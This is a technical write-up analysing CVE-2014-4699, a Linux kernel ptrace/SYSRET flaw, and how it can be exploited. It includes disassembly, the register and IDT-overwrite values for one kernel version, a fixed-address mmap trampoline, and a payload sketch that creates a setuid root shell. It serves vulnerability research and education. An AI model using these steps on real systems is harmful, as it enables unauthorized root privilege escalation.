CVE-2014-4699: Linux Kernel ptrace/sysret vulnerability analysis

by Vitaly Nikolenko


Posted on July 21, 2014 at 6:52PM


Introduction

I believe this bug was first discovered around 2005 and affected a number of operating systems (not just Linux) on Intel 64-bit CPUs. The bug is basically how the SYSRET instruction is used by 64-bit kernels in the system call exit path. Unlike its slower alternative IRET, SYSRET does not restore all regular registers, segment registers or reflags. This is why it's faster than IRET. I've released the PoC code (on Twitter last week) that triggers the #GP in SYSRET and overwrites the #PF handler transferring the execution flow to the NOP sled mapped at a specific memory address in user-space. The following is my attempt to explain how this vulnerability is triggered.

First, let's take a step back to see what the SYSRET instruction actually does. According to AMD, the SYSRET does the following:

  1. Load the instruction pointer (%rip) from %rcx
  2. Change code segment selector to guest mode (this effectively changes the privilege level)

and this is exactly what it does on both Intel and AMD platforms. However, the difference between these two platforms comes to play when a general protection fault (#GP) is triggered. This fault is triggered if a non-canonical memory address ends up in %rcx upon executing the SYSRET instruction (since SYSRET loads %rip from %rcx). What is a non-canonical address? There are a few good explanations on the web (e.g., this link). On AMD architectures, the %rip is not assigned until after the privilege level has been changed back to guest mode (and #GP in user-space is not very interesting). However, on Intel architectures, the #GP fault is thrown in privileged mode (ring0). This also means that the current %rsp value is used in handling the #GP! Since SYSRET does not restore the %rsp, the kernel has to perform this operation prior to executing SYSRET. By the time the #GP happens, the kernel would have already restored the %rsp value from the user-space %rsp. In summary, this means that if we can trigger #GP in SYSRET:

  1. #GP will execute in privileged mode
  2. #GP will use the stack pointer supplied by us from user-space

That's great but how do we trigger the #GP fault in the first place? The %rip address loaded from %rcx would always be canonical. That's where ptrace comes into play. If you are not familiar with ptrace, this is a good place to start. In short, that's how debuggers stop a running process and let you change register values on-the-fly. Using ptrace we can change %rip and %rsp to arbitrary values. Most ptrace paths go via the interface that catches the process using the signal handler which always returns with IRET. However, there are a few paths that can get caught with ptrace_event() instaed of the signal path. Refer to the PoC code for an example of using fork() with ptrace to force such a path.

Exploitation

For the exploitation phase, I was using Ubuntu 12.04.0 LTS (3.2.0-23-generic) simply because that's what I had at the moment as my VM. I think it was mentioned that this issue would affect 2.6.x as well as 3.x branches.

To trigger the #GP fault in SYSRET we obviously need to set our %rip to a non-canonical address. In the PoC I'm using 0x8fffffffffffffff but any non-canonical address would work. The next step is to set the %rsp value. If we'll set it to a user-space address, we'll simply double fault. However, if we'll set it to a writable address in kernel-space, we can overwrite data on the stack.

Let's take a look at the general_protection handler that we enter with an arbitrary %rsp pointer:

0xffffffff8165cba0 <general_protection>       data32 xchg %ax,%ax
0xffffffff8165cba3 <general_protection+3>     data32 xchg %ax,%ax
0xffffffff8165cba6 <general_protection+6>     sub    $0x78,%rsp
0xffffffff8165cbaa <general_protection+10>    callq  0xffffffff8165cd90 <error_entry>     [1]
0xffffffff8165cbaf <general_protection+15>    mov    %rsp,%rdi
0xffffffff8165cbb2 <general_protection+18>    mov    0x78(%rsp),%rsi
0xffffffff8165cbb7 <general_protection+23>    movq   $0xffffffffffffffff,0x78(%rsp)
0xffffffff8165cbc0 <general_protection+32>    callq  0xffffffff8165d040 <do_general_prote [2]
0xffffffff8165cbc5 <general_protection+37>    jmpq   0xffffffff8165ce30 <error_exit>
0xffffffff8165cbca                            nopw   0x0(%rax,%rax,1)
...

When entering the error_entry at [1], we overwrite a few entries on the stack (0x78(%rsp) to 0x8(%rsp)):

0xffffffff8165cd8f <error_entry>                cld
0xffffffff8165cd91 <error_entry+1>              mov    %rdi,0x78(%rsp)
0xffffffff8165cd96 <error_entry+6>              mov    %rsi,0x70(%rsp)
0xffffffff8165cd9b <error_entry+11>             mov    %rdx,0x68(%rsp)
0xffffffff8165cda0 <error_entry+16>             mov    %rcx,0x60(%rsp)
0xffffffff8165cda5 <error_entry+21>             mov    %rax,0x58(%rsp)
0xffffffff8165cdaa <error_entry+26>             mov    %r8,0x50(%rsp) 
0xffffffff8165cdaf <error_entry+31>             mov    %r9,0x48(%rsp) 
0xffffffff8165cdb4 <error_entry+36>             mov    %r10,0x40(%rsp)
0xffffffff8165cdb9 <error_entry+41>             mov    %r11,0x38(%rsp)
0xffffffff8165cdbe <error_entry+46>             mov    %rbx,0x30(%rsp)
0xffffffff8165cdc3 <error_entry+51>             mov    %rbp,0x28(%rsp)
0xffffffff8165cdc8 <error_entry+56>             mov    %r12,0x20(%rsp)
0xffffffff8165cdcd <error_entry+61>             mov    %r13,0x18(%rsp)
0xffffffff8165cdd2 <error_entry+66>             mov    %r14,0x10(%rsp)
0xffffffff8165cdd7 <error_entry+71>             mov    %r15,0x8(%rsp) 
...

However, we can control all these registers (well, except for %rcx) via PTRACE_SETREGS (see the PoC for details):

// get current registers
ptrace(PTRACE_GETREGS, chld, NULL, &regs);

// modify regs
...

// set regs
ptrace(PTRACE_SETREGS, chld, NULL, &regs);

The general_protection handler then invokes the do_general_protection function at [2]:

Dump of assembler code for function do_general_protection:
   0xffffffff8165d040 <+0>:     push   %rbp
   0xffffffff8165d041 <+1>:     mov    %rsp,%rbp
   0xffffffff8165d044 <+4>:     sub    $0x20,%rsp
   0xffffffff8165d048 <+8>:     mov    %rbx,-0x18(%rbp)
   0xffffffff8165d04c <+12>:    mov    %r12,-0x10(%rbp)
   0xffffffff8165d050 <+16>:    mov    %r13,-0x8(%rbp)
   0xffffffff8165d054 <+20>:    callq  0xffffffff816647c0 <mcount>
   0xffffffff8165d059 <+25>:    testb  $0x2,0x91(%rdi)
   0xffffffff8165d060 <+32>:    mov    %rdi,%r12
   0xffffffff8165d063 <+35>:    mov    %rsi,%r13
   0xffffffff8165d066 <+38>:    je     0xffffffff8165d06f <do_general_protection+47>
   0xffffffff8165d068 <+40>:    callq  *0xffffffff81c177d8
   0xffffffff8165d06f <+47>:    mov    %gs:0xc500,%rbx                                   [3]
   0xffffffff8165d078 <+56>:    testb  $0x3,0x88(%r12)
   0xffffffff8165d081 <+65>:    je     0xffffffff8165d140 <do_general_protection+256>
   ...

At [3], the kernel will page fault when accessing %gs:0xc500, then double fault and crash. The question now is what can we do to prevent the kernel from crashing and possibly transfer execution flow to our mapped memory region in user-space? Well, let's just overwrite the #PF (Page Fault) handler in the IDT (Interrupt Descriptor Table) with a memory address that we control. In the PoC code, I've mapped the following memory region in user-space:

   trampoline = mmap(0x80000000, 0x10000000, 7|PROT_EXEC|PROT_READ|PROT_WRITE,
                     0x32|MAP_FIXED|MAP_POPULATE|MAP_GROWSDOWN, 0,0);

We then set our %rsp value to regs.rsp = idt.addr + 14*16 + 8 + 0xb0 - 0x78, i.e., the IDT start address + address of the #PF handler (14th entry where each entry is 16 bytes) + 8 bytes (we need to overwrite offset 32..63 in the #PF entry with 0) + some padding. The Intel developer's manual (Vol 3A) provides a good explanation of the IDT structure.

In the PoC code, the %rdi value (which is set to 0, regs.rdi = 0x0000000000000000) will overwrite the offset 32..63 in the #PF entry leaving us with a memory address that points to user-space. On my test VM, this address is 0x8165cbd0 which is why we've mapped our user-space memory region at 0x800000000-0x900000000.

I should point out that it's important to MAP_POPULATE when mapping this memory region so we don't trigger #PF on accessing our mapped user-space address, i.e., #PF with trigger a double fault in this case. Here's the excerpt from the mmap(2) man page:

 MAP_POPULATE (since Linux 2.5.46)
              Populate (prefault) page tables for a mapping.  For a file
              mapping, this causes read-ahead on the file.  Later accesses
              to the mapping will not be blocked by page faults.
              MAP_POPULATE is supported for private mappings only since
              Linux 2.6.23.

Once the #PF is triggered, we'll land to our NOP sled. However, by that time, the IDT will be trashed. We've overwritten a few entries in the IDT including a number of critical handlers. In the PoC, there is an attempt to restore the IDT by setting the register values (%rdi, %rsi, rdx, etc) to the original values:

	regs.rdi = 0x0000000000000000;
	regs.rsi = 0x81658e000010cbd0;
	regs.rdx = 0x00000000ffffffff;
	regs.rcx = 0x81658e000010cba0;
	regs.rax = 0x00000000ffffffff;
	regs.r8  = 0x81658e010010cb00;
	regs.r9  = 0x00000000ffffffff;
	regs.r10 = 0x81668e0000106b10;
	regs.r11 = 0x00000000ffffffff;
	regs.rbx = 0x81668e0000106ac0;
	regs.rbp = 0x00000000ffffffff;
	regs.r12 = 0x81668e0000106ac0;
	regs.r13 = 0x00000000ffffffff;
	regs.r14 = 0x81668e0200106a90;
	regs.r15 = 0x00000000ffffffff;

This code is obviously very kernel-specific. In the payload, we can then do the usual privilege escalation routine commit_creds(prepare_kernel_cred(NULL)), followed by some syscall execution (e.g., setuid(0); cp /bin/sh .; chown root:root ./sh; chmod u+s ./sh). Or we could attempt to set the appropriate registers and IRET to user-space with a stack pointer of our choice.

Conclusion

There are a few things to note here. The PoC is very kernel-specific. Trashing the IDT is not a good approach (i.e., it affects the kernel stability). Since 3.10.x the IDT is read-only, so this approach would no longer work. There are other kernel structs that can be overwriten that would give us a more reliable (and somewhat more universal) way of exploitation.